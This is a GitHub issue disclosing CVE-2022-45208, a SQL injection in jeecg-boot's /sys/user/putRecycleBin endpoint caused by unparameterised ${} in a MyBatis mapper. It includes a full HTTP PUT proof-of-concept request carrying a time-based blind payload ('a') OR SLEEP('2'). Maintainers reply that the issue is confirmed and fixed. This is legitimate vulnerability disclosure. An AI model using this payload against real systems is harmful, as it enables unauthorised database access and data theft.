Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection #4126

Closed
azraelxuemo opened this issue Oct 25, 2022 · 2 comments
Closed

Comments

@azraelxuemo
Copy link

azraelxuemo commented Oct 25, 2022

sysUserMapper.xml

revertLogicDeleted. You can see that no precompiling is performed
截屏2022-10-25 11 40 04

SysUserController.java

截屏2022-10-25 11 40 32

SysUserServiceImpl.java

截屏2022-10-25 11 41 42

So Users can pass in malicious parameters through http requests to achieve SQL injection

poc

The website will return immediately when the following content is passed in
截屏2022-10-25 11 43 33
After the following content is passed in, the website will return after a delay of 2 seconds
截屏2022-10-25 11 43 57

vuln

attack can user this to get data from database

payload:

PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

{
"userIds": "a') OR SLEEP('2"
}

patch

In (${})
It seems that this cannot be modified to precompile
So it is recommended to add some keywords such as')

@zhangdaiscott
Copy link
Member

确认可改

@zhangdaiscott
Copy link
Member

已修复

zhangdaiscott added a commit that referenced this issue Nov 2, 2022
/sys/user/deleteRecycleBin is affected by sql injection #4125
@azraelxuemo azraelxuemo changed the title /sys/user/putRecycleBin is affected by sql injection [CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection Dec 7, 2022
XKC1025 pushed a commit to XKC1025/jeecg-boot that referenced this issue Mar 13, 2023
/sys/user/deleteRecycleBin is affected by sql injection jeecgboot#4125
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants